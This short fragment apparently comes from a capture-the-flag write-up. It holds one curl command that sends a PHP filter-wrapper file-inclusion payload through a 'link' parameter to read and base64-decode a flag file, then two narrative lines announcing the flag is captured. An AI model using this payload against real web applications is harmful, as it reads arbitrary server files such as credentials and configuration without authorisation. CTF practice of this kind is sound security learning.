curl -s "http://HOST/roughman-injection/rapidshare1.php?link=php%3A%2F%2Ffilter%2Fconvert.base64-encode%2Fresource%3D%2Fhome%2Fctf%2Fflag.txt" | grep -oE '[A-Za-z0-9+/=]+' | base64 -d
The screen went black.
The flag is now captured.